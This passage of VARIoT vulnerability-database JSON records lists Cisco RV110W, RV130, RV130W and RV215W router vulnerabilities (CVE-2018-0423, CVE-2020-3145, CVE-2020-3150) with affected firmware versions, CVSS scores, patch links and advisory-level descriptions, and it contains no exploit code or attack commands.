              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-17682"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-18074"
          },
          {
            "db": "VULHUB",
            "id": "VHN-118625"
          }
        ],
        "trust": 1.8900693866666667
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 1.2
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-17682"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-18074"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:00:16.772000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-20180905-rv-routers-overflow",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180905-rv-routers-overflow"
          },
          {
            "title": "Patch for Cisco Router Management Interface Buffer Overflow Vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/139767"
          },
          {
            "title": "Cisco RV110W Wireless-N VPN Firewall , RV130W Wireless-N Multifunction VPN Router  and RV215W Wireless-N VPN Router Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=84585"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-18074"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010561"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-254"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-118625"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010561"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-0423"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.6,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180905-rv-routers-overflow"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/105285"
          },
          {
            "trust": 1.7,
            "url": "http://www.securitytracker.com/id/1041675"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-0423"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-0423"
          },
          {
            "trust": 0.3,
            "url": "http://www.cisco.com/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-17682"
          },
          {
            "db": "VULHUB",
            "id": "VHN-118625"
          },
          {
            "db": "BID",
            "id": "105285"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010561"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-254"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-0423"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-17682"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-18074"
          },
          {
            "db": "VULHUB",
            "id": "VHN-118625"
          },
          {
            "db": "BID",
            "id": "105285"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010561"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-254"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-0423"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-09-06T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-17682"
          },
          {
            "date": "2018-09-10T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-18074"
          },
          {
            "date": "2018-10-05T00:00:00",
            "db": "VULHUB",
            "id": "VHN-118625"
          },
          {
            "date": "2018-09-05T00:00:00",
            "db": "BID",
            "id": "105285"
          },
          {
            "date": "2018-12-18T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-010561"
          },
          {
            "date": "2018-09-06T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201809-254"
          },
          {
            "date": "2018-10-05T14:29:00.857000",
            "db": "NVD",
            "id": "CVE-2018-0423"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-09-11T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-17682"
          },
          {
            "date": "2018-09-10T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-18074"
          },
          {
            "date": "2019-10-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-118625"
          },
          {
            "date": "2018-09-05T00:00:00",
            "db": "BID",
            "id": "105285"
          },
          {
            "date": "2018-12-18T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-010561"
          },
          {
            "date": "2019-10-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201809-254"
          },
          {
            "date": "2024-11-21T03:38:11.887000",
            "db": "NVD",
            "id": "CVE-2018-0423"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-254"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural  Cisco RV Product Buffer error vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010561"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-254"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202007-1014

    Vulnerability from variot - Updated: 2024-11-23 21:59

    Multiple vulnerabilities in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, RV130 VPN Router, RV130W Wireless-N Multifunction VPN Router, and RV215W Wireless-N VPN Router could allow an authenticated, remote attacker to execute arbitrary code on an affected device. The vulnerabilities are due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit these vulnerabilities by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user. plural Cisco RV A buffer error vulnerability exists in series routers.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202007-1014",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv110w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv215w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.55"
          },
          {
            "model": "rv130",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.55"
          },
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w wireless-n multifunction vpn routerr",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008401"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3145"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv130w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv130_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008401"
          }
        ]
      },
      "cve": "CVE-2020-3145",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2020-3145",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "Single",
                "author": "NVD",
                "availabilityImpact": "Partial",
                "baseScore": 6.5,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-008401",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2020-3145",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "ykramarz@cisco.com",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2020-3145",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 8.8,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-008401",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "Low",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2020-3145",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2020-3145",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "JVNDB-2020-008401",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202007-1083",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2020-3145",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2020-3145"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008401"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202007-1083"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3145"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3145"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, RV130 VPN Router, RV130W Wireless-N Multifunction VPN Router, and RV215W Wireless-N VPN Router could allow an authenticated, remote attacker to execute arbitrary code on an affected device. The vulnerabilities are due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit these vulnerabilities by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user. plural Cisco RV A buffer error vulnerability exists in series routers.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-3145"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008401"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-3145"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-3145",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008401",
            "trust": 0.8
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2020.2417",
            "trust": 0.6
          },
          {
            "db": "NSFOCUS",
            "id": "48354",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202007-1083",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-3145",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2020-3145"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008401"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202007-1083"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3145"
          }
        ]
      },
      "id": "VAR-202007-1014",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.611919898
      },
      "last_update_date": "2024-11-23T21:59:08.857000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-rv-rce-m4FEEGWX",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-rce-m4FEEGWX"
          },
          {
            "title": "Multiple Cisco Product Buffer Error Vulnerability Fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=124565"
          },
          {
            "title": "The Register",
            "trust": 0.2,
            "url": "https://www.theregister.co.uk/2020/07/16/cisco_patches_july/"
          },
          {
            "title": "Cisco: Cisco RV110W, RV130, RV130W, and RV215W Routers Management Interface Remote Command Execution Multiple Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-rv-rce-m4FEEGWX"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2020-3145"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008401"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202007-1083"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008401"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3145"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-rce-m4feegwx"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-3145"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-3145"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2020.2417/"
          },
          {
            "trust": 0.6,
            "url": "http://www.nsfocus.net/vulndb/48354"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/119.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2020-3145"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008401"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202007-1083"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3145"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2020-3145"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008401"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202007-1083"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3145"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-07-16T00:00:00",
            "db": "VULMON",
            "id": "CVE-2020-3145"
          },
          {
            "date": "2020-09-11T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-008401"
          },
          {
            "date": "2020-07-15T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202007-1083"
          },
          {
            "date": "2020-07-16T18:15:16.580000",
            "db": "NVD",
            "id": "CVE-2020-3145"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-07-23T00:00:00",
            "db": "VULMON",
            "id": "CVE-2020-3145"
          },
          {
            "date": "2020-09-11T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-008401"
          },
          {
            "date": "2020-09-03T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202007-1083"
          },
          {
            "date": "2024-11-21T05:30:25.127000",
            "db": "NVD",
            "id": "CVE-2020-3145"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202007-1083"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural  Cisco RV Buffer error vulnerability in series routers",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008401"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202007-1083"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202007-1016

    Vulnerability from variot - Updated: 2024-11-23 21:59

    A vulnerability in the web-based management interface of Cisco Small Business RV110W and RV215W Series Routers could allow an unauthenticated, remote attacker to download sensitive information from the device, which could include the device configuration. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing a specific URI on the web-based management interface of the router, but only after any valid user has opened a specific file on the device since the last reboot. A successful exploit would allow the attacker to view sensitive information, which should be restricted. Cisco Small Business RV110W Wireless-N VPN Firewall Routers is a VPN router of the US Cisco (Cisco).

    Cisco Small Business RV110W Wireless-N VPN Firewall versions prior to 1.2.2.8 and RV215W Wireless-N VPN Router versions prior to 1.3.1.7 have authorization issues in the Web management interface

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202007-1016",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv110w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv215w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "small business rv110w wireless-n vpn firewall",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "1.3.1.7"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-44623"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008403"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3150"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008403"
          }
        ]
      },
      "cve": "CVE-2020-3150",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
